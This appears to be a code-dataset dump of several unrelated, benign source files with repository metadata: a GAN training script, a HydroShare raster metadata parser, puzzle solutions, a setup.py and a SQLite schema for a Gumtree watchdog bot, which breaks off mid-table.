eff = np.squeeze(eff, 1)
eff_lb = np.squeeze(eff_lb, 1)
eff_ub = np.squeeze(eff_ub, 1)
df = pd.DataFrame({'Treatment': rec,
'Effect of treatment': eff,
'Effect of treatment lower bound': eff_lb,
'Effect of treatment upper bound': eff_ub},
index=orig_df.index)
return df.join(orig_df).sort_values('Effect of treatment',
ascending=False).head(n_rows)
def _individualized_policy_dict(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: dictionary
dictionary containing treatment policy, effects, and other columns
"""
return self.individualized_policy(Xtest, feature_index,
n_rows=n_rows,
treatment_costs=treatment_costs,
alpha=alpha).to_dict('list')
def typical_treatment_value(self, feature_index):
"""
Get the typical treatment value used for the specified feature
Parameters
----------
feature_index: int or string
The index of the feature to be considered as treatment
Returns
-------
treatment_value : float
The treatment value considered 'typical' for this feature
"""
result = [res for res in self._results if res.feature_index == feature_index]
if len(result) == 0:
if self._has_column_names:
result = [res for res in self._results if res.feature_name == feature_index]
assert len(result) == 1, f"Could not find feature with index/name {feature_index}"
return result[0].treatment_value
else:
raise ValueError(f"No feature with index {feature_index}")
return result[0].treatment_value
| 51.319196
| 119
| 0.603562
| 73,135
| 0.795257
| 0
| 0
| 1,401
| 0.015234
| 0
| 0
| 42,148
| 0.45831
|
c4083724a00de9c5692943d43c6a11f16b96a31e
| 1,365
|
py
|
Python
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 1
|
2020-10-01T16:54:52.000Z
|
2020-10-01T16:54:52.000Z
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 2
|
2020-10-07T02:22:13.000Z
|
2020-10-22T06:15:50.000Z
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 9
|
2020-10-01T12:30:56.000Z
|
2020-10-22T06:10:14.000Z
|
'''
problem--
Given five positive integers, find the minimum and maximum values that can be calculated by summing exactly four of the five integers. Then print the respective minimum and maximum values as a single line of two space-separated long integers.
For example, arr=[1,3,5,7,9]. Our minimum sum is 1+3+5+7=16 and our maximum sum is 3+5+7+9=24. We would print
16 24
Function Description--
Complete the miniMaxSum function in the editor below. It should print two space-separated integers on one line: the minimum sum and the maximum sum of 4 of 5 elements.
miniMaxSum has the following parameter(s):
arr: an array of 5 integers
Input Format--
A single line of five space-separated integers.
Constraints--
1<arr[i]<=10^9
Output Format--
Print two space-separated long integers denoting the respective minimum and maximum values that can be calculated by summing exactly four of the five integers. (The output can be greater than a 32 bit integer.)
Sample Input---
1 2 3 4 5
Sample Output--
10 14
'''
#code here
#!/bin/python3
import math
import os
import random
import re
import sys
def miniMaxSum(arr):
l1=[]
for i in arr:
x=-i
for j in arr:
x+=j
l1.append(x)
print(min(l1),max(l1))
if __name__ == '__main__':
arr = list(map(int, input().rstrip().split()))
miniMaxSum(arr)
| 24.375
| 242
| 0.710623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,048
| 0.767766
|
c40b63017932ee0022e50a1cd077dafbac537066
| 4,610
|
py
|
Python
|
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | 1
|
2020-04-12T17:54:52.000Z
|
2020-04-12T17:54:52.000Z
|
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | null | null | null |
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | null | null | null |
from pprint import pprint
from enum import Enum
class Direction(Enum):
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
class Network:
def __init__(self, diagramRows):
self.diagram = self.setDiagram(diagramRows)
self.currentPosition = self.setCurrentPosition()
self.currentDirection = Direction.DOWN
self.route = []
self.steps = 1
def setDiagram(self, diagramRows):
splitRows = []
for diagramRow in diagramRows:
splitRows.append(list(diagramRow))
return splitRows
def setCurrentPosition(self):
startIndex = self.diagram[0].index('|')
return (startIndex, 0)
def getTraveledRoute(self):
return ''.join(self.route)
def getTraveledSteps(self):
return self.steps
def getForwardPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0], self.currentPosition[1] - 1)
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0], self.currentPosition[1] + 1)
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0] + 1, self.currentPosition[1])
def getLeftPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0] + 1, self.currentPosition[1])
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0], self.currentPosition[1] + 1)
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0], self.currentPosition[1] - 1)
def getRightPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0] + 1, self.currentPosition[1])
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0], self.currentPosition[1] - 1)
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0], self.currentPosition[1] + 1)
def positionExists(self, position):
return (position[1] > 0
and position[1] < len(self.diagram)
and position[0] > 0
and position[0] < len(self.diagram[position[1]])
and self.diagram[position[1]][position[0]] is not ' ')
def changeDirectionLeft(self):
if self.currentDirection == Direction.UP:
self.currentDirection = Direction.LEFT
elif self.currentDirection == Direction.DOWN:
self.currentDirection = Direction.RIGHT
elif self.currentDirection == Direction.LEFT:
self.currentDirection = Direction.DOWN
elif self.currentDirection == Direction.RIGHT:
self.currentDirection = Direction.UP
def changeDirectionRight(self):
if self.currentDirection == Direction.UP:
self.currentDirection = Direction.RIGHT
elif self.currentDirection == Direction.DOWN:
self.currentDirection = Direction.LEFT
elif self.currentDirection == Direction.LEFT:
self.currentDirection = Direction.UP
elif self.currentDirection == Direction.RIGHT:
self.currentDirection = Direction.DOWN
def getNextPosition(self):
nextPosition = self.getForwardPosition()
if self.positionExists(nextPosition):
return nextPosition
nextPosition = self.getLeftPosition()
if self.positionExists(nextPosition):
self.changeDirectionLeft()
return nextPosition
nextPosition = self.getRightPosition()
if self.positionExists(nextPosition):
self.changeDirectionRight()
return nextPosition
return False
def run(self):
hasNextPosition = True
while hasNextPosition:
nextPosition = self.getNextPosition()
if not nextPosition:
hasNextPosition = False
else:
self.currentPosition = nextPosition
self.steps += 1
character = self.diagram[nextPosition[1]][nextPosition[0]]
if character.isalpha():
self.route.append(character)
| 37.786885
| 74
| 0.632972
| 4,558
| 0.98872
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.006725
|
c40cb374c8f69dbfb3dd6a423d469c3fd1845232
| 2,639
|
py
|
Python
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 117
|
2019-07-14T20:39:48.000Z
|
2021-10-17T19:16:48.000Z
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 41
|
2019-12-06T23:56:44.000Z
|
2021-08-02T09:13:30.000Z
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 13
|
2019-09-22T00:46:54.000Z
|
2021-04-09T15:53:15.000Z
|
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
| 29.322222
| 84
| 0.61349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.069344
|
c40ce4ea8967938d11ba63e971d617289f172e0d
| 22
|
py
|
Python
|
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
print ("Hello Word!")
| 11
| 21
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 13
| 0.590909
|
c40e9360b8918f73e4cf97eef85c363173d03ce0
| 21,719
|
py
|
Python
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 1
|
2018-09-17T13:07:29.000Z
|
2018-09-17T13:07:29.000Z
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 100
|
2017-08-01T23:48:04.000Z
|
2018-04-03T13:17:27.000Z
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 2
|
2017-07-27T20:41:33.000Z
|
2017-07-27T22:40:57.000Z
|
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
"""
Lightweight class for representing metadata of RasterResource instances.
"""
def __init__(self):
super(RasterResourceMeta, self).__init__()
self.cell_info = None
self.band_info = []
self.spatial_reference = None
def _read_resource_metadata(self):
super(RasterResourceMeta, self)._read_resource_metadata()
print("--- RasterResourceMeta ---")
# Also parse using SAX so that we can capture certain metadata elements
# in the same order in which they appear in the RDF+XML serialization.
SAX_parse_results = RasterResourceSAXHandler()
xml.sax.parse(self.rmeta_path, SAX_parse_results)
hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
# Get CellInformation
for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
self.cell_info = RasterResourceMeta.CellInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for CellInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.name = str(name_lit)
# Get rows
rows_lit = self._rmeta_graph.value(o, hsterms.rows)
if rows_lit is None:
msg = "Rows attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.rows = int(str(rows_lit))
# Get columns
columns_lit = self._rmeta_graph.value(o, hsterms.columns)
if columns_lit is None:
msg = "Columns attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.columns = int(str(columns_lit))
# Get cellSizeXValue
cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
if cellX_lit is None:
msg = "cellSizeXValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeXValue = float(str(cellX_lit))
# Get cellSizeYValue
cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
if cellY_lit is None:
msg = "cellSizeYValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeYValue = float(str(cellY_lit))
# Get cellDataType
celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
if celldt_lit is None:
msg = "cellDataType attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellDataType = str(celldt_lit)
# Get noDateValue
nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
if nodata_lit is not None:
self.cell_info.noDataValue = float(str(nodata_lit))
print("\t\t{0}".format(self.cell_info))
# Get BandInformation
if SAX_parse_results:
# Use band info from SAX parser
self.band_info = list(SAX_parse_results.band_info)
else:
# Get band info from RDF
for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
band_info = RasterResourceMeta.BandInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.name = str(name_lit)
# Get variableName
varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
if varname_lit is None:
msg = "variableName for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableName = str(varname_lit)
# Get variableUnit
varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
if varunit_lit is None:
msg = "variableUnit for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableUnit = str(varunit_lit)
# Get method
method_lit = self._rmeta_graph.value(o, hsterms.method)
if method_lit is not None:
band_info.method = str(method_lit)
# Get comment
comment_lit = self._rmeta_graph.value(o, hsterms.comment)
if comment_lit is not None:
band_info.comment = str(comment_lit)
self.band_info.append(band_info)
for b in self.band_info:
print("\t\t{0}".format(str(b)))
# Get spatialReference
for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
if spat_ref_lit is None:
msg = "Spatial reference value not found for {0}.".format(o)
raise GenericResourceMeta.ResourceMetaException(msg)
self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
print("\t\t{0}".format(self.spatial_reference))
@transaction.atomic
def write_metadata_to_resource(self, resource):
"""
Write metadata to resource
:param resource: RasterResource instance
"""
super(RasterResourceMeta, self).write_metadata_to_resource(resource)
if self.cell_info:
resource.metadata.cellInformation.delete()
resource.metadata.create_element('CellInformation', name=self.cell_info.name,
rows=self.cell_info.rows,
columns=self.cell_info.columns,
cellSizeXValue=self.cell_info.cellSizeXValue,
cellSizeYValue=self.cell_info.cellSizeYValue,
cellDataType=self.cell_info.cellDataType,
noDataValue=self.cell_info.noDataValue)
if len(self.band_info) > 0:
for band in resource.metadata.bandInformation:
band.delete()
for b in self.band_info:
resource.metadata.create_element('BandInformation', name=b.name,
variableName=b.variableName,
variableUnit=b.variableUnit, method=b.method,
comment=b.comment)
if self.spatial_reference:
resource.metadata.originalCoverage.delete()
values = {'units': self.spatial_reference.units,
'northlimit': self.spatial_reference.northlimit,
'eastlimit': self.spatial_reference.eastlimit,
'southlimit': self.spatial_reference.southlimit,
'westlimit': self.spatial_reference.westlimit,
'projection': self.spatial_reference.projection}
kwargs = {'value': values}
resource.metadata.create_element('OriginalCoverage', **kwargs)
class CellInformation(object):
def __init__(self):
self.name = None
self.rows = None
self.columns = None
self.cellSizeXValue = None
self.cellSizeYValue = None
self.cellDataType = None
self.noDataValue = None # Optional
def __str__(self):
msg = "CellInformation name: {name}, "
msg += "rows: {rows}, columns: {columns}, "
msg += "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
msg += "cellDataType: {cellDataType}, noDataValue: {noDataValue}"
msg = msg.format(name=self.name, rows=self.rows,
columns=self.columns, cellSizeXValue=self.cellSizeXValue,
cellSizeYValue=self.cellSizeYValue, cellDataType=self.cellDataType,
noDataValue=self.noDataValue)
return msg
def __unicode__(self):
return unicode(str(self))
class BandInformation(object):
def __init__(self):
self.name = None
self.variableName = None
self.variableUnit = None
self.method = None # Optional
self.comment = None # Optional
def __str__(self):
msg = "BandInformation name: {name}, "
msg += "variableName: {variableName}, variableUnit: {variableUnit}, "
msg += "method: {method}, comment: {comment}"
msg = msg.format(name=self.name, variableName=self.variableName,
variableUnit=self.variableUnit, method=self.method,
comment=self.comment)
return msg
def __unicode__(self):
return unicode(str(self))
class SpatialReference(object):
def __init__(self):
self.northlimit = None
self.eastlimit = None
self.southlimit = None
self.westlimit = None
self.units = None
self.projection = None # Optional
def __str__(self):
msg = "SpatialReference northlimit: {northlimit}, "
msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
southlimit=self.southlimit, westlimit=self.westlimit,
units=self.units, projection=self.projection)
return msg
def __unicode__(self):
return unicode(str(self))
def __init__(self, value_str):
kvp = value_str.split(';')
for pair in kvp:
(key, value) = pair.split('=')
key = key.strip()
value = value.strip()
if key == 'name':
self.name = value
elif key == 'eastlimit':
try:
self.eastlimit = float(value)
except Exception as e:
msg = "Unable to parse east limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'northlimit':
try:
self.northlimit = float(value)
except Exception as e:
msg = "Unable to parse north limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'southlimit':
try:
self.southlimit = float(value)
except Exception as e:
msg = "Unable to parse south limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'westlimit':
try:
self.westlimit = float(value)
except Exception as e:
msg = "Unable to parse west limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'units':
self.units = value
elif key == 'projection':
self.projection = value
class RasterResourceSAXHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
# Content
self.band_info = []
# State variables
self._get_bandinfo = False
self._get_bandinfo_details = False
self._get_bandinfo_name = False
self._bandinfo_name = None
self._get_bandinfo_var_name = False
self._bandinfo_var_name = None
self._get_bandinfo_var_unit = False
self._bandinfo_var_unit = None
self._get_bandinfo_method = False
self._bandinfo_method = None
self._get_bandinfo_comment = False
self._bandinfo_comment = None
def characters(self, content):
if self._get_bandinfo_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information name."
raise xml.sax.SAXException(msg)
self._bandinfo_name.append(content)
elif self._get_bandinfo_var_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable name."
raise xml.sax.SAXException(msg)
self._bandinfo_var_name.append(content)
elif self._get_bandinfo_var_unit:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable unit."
raise xml.sax.SAXException(msg)
self._bandinfo_var_unit.append(content)
elif self._get_bandinfo_method:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information method."
raise xml.sax.SAXException(msg)
self._bandinfo_method.append(content)
elif self._get_bandinfo_comment:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information comment."
raise xml.sax.SAXException(msg)
self._bandinfo_comment.append(content)
def startElement(self, name, attrs):
if name == 'hsterms:BandInformation':
if self._get_bandinfo:
raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
self._get_bandinfo = True
elif name == 'rdf:Description':
if self._get_bandinfo:
if self._get_bandinfo_details:
msg = "Error: nested rdf:Description elements " \
"within hsterms:BandInformation element."
raise xml.sax.SAXException(msg)
# Create new band info
self.band_info.append(RasterResourceMeta.BandInformation())
self._get_bandinfo_details = True
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if self._get_bandinfo_name:
raise xml.sax.SAXException("Error: nested hsterms:name elements "
"within hsterms:BandInformation.")
self._get_bandinfo_name = True
self._bandinfo_name = []
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if self._get_bandinfo_var_name:
raise xml.sax.SAXException("Error: nested hsterms:variableName elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_name = True
self._bandinfo_var_name = []
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if self._get_bandinfo_var_unit:
raise xml.sax.SAXException("Error: nested hsterms:variableUnit elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_unit = True
self._bandinfo_var_unit = []
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if self._get_bandinfo_method:
raise xml.sax.SAXException("Error: nested hsterms:method elements "
"within hsterms:BandInformation.")
self._get_bandinfo_method = True
self._bandinfo_method = []
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if self._get_bandinfo_comment:
raise xml.sax.SAXException("Error: nested hsterms:comment elements "
"within hsterms:BandInformation.")
self._get_bandinfo_comment = True
self._bandinfo_comment = []
def endElement(self, name):
if name == 'hsterms:BandInformation':
if not self._get_bandinfo:
msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
raise xml.sax.SAXException(msg)
self._get_bandinfo = False
elif name == 'rdf:Description':
if self._get_bandinfo:
if not self._get_bandinfo_details:
msg = "Error: close rdf:Description tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self._get_bandinfo_details = False
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if not self._get_bandinfo_name:
msg = "Error: close hsterms:name tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].name = "".join(self._bandinfo_name)
self._bandinfo_name = None
self._get_bandinfo_name = False
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_name:
msg = "Error: close hsterms:variableName tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableName = "".join(self._bandinfo_var_name)
self._bandinfo_var_name = None
self._get_bandinfo_var_name = False
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_unit:
msg = "Error: close hsterms:variableUnit tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableUnit = "".join(self._bandinfo_var_unit)
self._bandinfo_var_unit = None
self._get_bandinfo_var_unit = False
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if not self._get_bandinfo_method:
msg = "Error: close hsterms:method tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].method = "".join(self._bandinfo_method)
self._bandinfo_method = None
self._get_bandinfo_method = False
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if not self._get_bandinfo_comment:
msg = "Error: close hsterms:comment tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].comment = "".join(self._bandinfo_comment)
self._bandinfo_comment = None
self._get_bandinfo_comment = False
| 47.215217
| 97
| 0.55776
| 21,594
| 0.994245
| 0
| 0
| 2,033
| 0.093605
| 0
| 0
| 4,285
| 0.197293
|
c410261f2af66c058c52c7122ed945e7bc1bf8e8
| 857
|
py
|
Python
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | 5
|
2019-01-15T12:31:49.000Z
|
2021-03-05T21:17:13.000Z
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | 1
|
2019-06-18T20:58:21.000Z
|
2019-06-18T20:58:21.000Z
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
import versioneer
packages = ['pygdf',
'pygdf.tests',
]
install_requires = [
'numba',
]
setup(name='pygdf',
description="GPU Dataframe",
version=versioneer.get_version(),
classifiers=[
# "Development Status :: 4 - Beta",
"Intended Audience :: Developers",
# "Operating System :: OS Independent",
"Programming Language :: Python",
# "Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
],
# Include the separately-compiled shared library
author="Continuum Analytics, Inc.",
packages=packages,
package_data={
'pygdf.tests': ['data/*.pickle'],
},
install_requires=install_requires,
license="BSD",
cmdclass=versioneer.get_cmdclass(),
)
| 24.485714
| 54
| 0.588098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.439907
|
c412a68b17b363d84e8cdaf62f22ff38191fc6e5
| 335
|
py
|
Python
|
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
from .multiagentenv import MultiAgentEnv
import sys
import os
def env_fn(env, **kwargs) -> MultiAgentEnv:
return env(**kwargs)
REGISTRY = {}
#REGISTRY["sc2"] = partial(env_fn, env=StarCraft2Env)
def register_env(nm, env_class):
global REGISTRY
REGISTRY[nm] = partial(env_fn, env=env_class)
| 22.333333
| 53
| 0.740299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 53
| 0.158209
|
c415cf0f1a05df7a1ed0253bc2693cc05cb80cc0
| 4,938
|
py
|
Python
|
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | 1
|
2019-03-04T15:38:01.000Z
|
2019-03-04T15:38:01.000Z
|
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | null | null | null |
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | null | null | null |
import os
import os.path
import sqlite3
import logging
from typing import List
from gumtree_watchdog.types import Listing, Contract, ListingWithChatId
TConn = sqlite3.Connection
DB_PATH = os.environ.get('GUMTREE_DB')
def get_connection() -> TConn:
if not DB_PATH:
raise Exception("Please specify Sqlite3 db path as environment variable GUMTREE_DB")
conn = sqlite3.connect(DB_PATH)
conn.row_factory = sqlite3.Row
return conn
def initialize():
if os.path.isfile(DB_PATH):
logging.info("Sqlite3 database found.")
return
logging.warning("Sqlite3 database not found, will initialize.")
with get_connection() as conn:
conn.execute("""
CREATE TABLE contract(
contract_id integer primary key autoincrement,
query text not null,
chat_id integer not null,
is_active bool default 0,
UNIQUE(chat_id, query)
);
""")
conn.execute("""
CREATE TABLE listing(
listing_id integer primary key autoincrement,
contract_id integer not null,
ad_id text not null,
title text not null,
description text not null,
url text,
must_notify_user bool default 1,
FOREIGN KEY(contract_id) REFERENCES contract(contract_id),
UNIQUE(contract_id, ad_id)
);
""")
conn.execute("""
CREATE TABLE inbound_msg(
inbound_msg_id integer primary key autoincrement,
chat_id integer not null,
message text not null
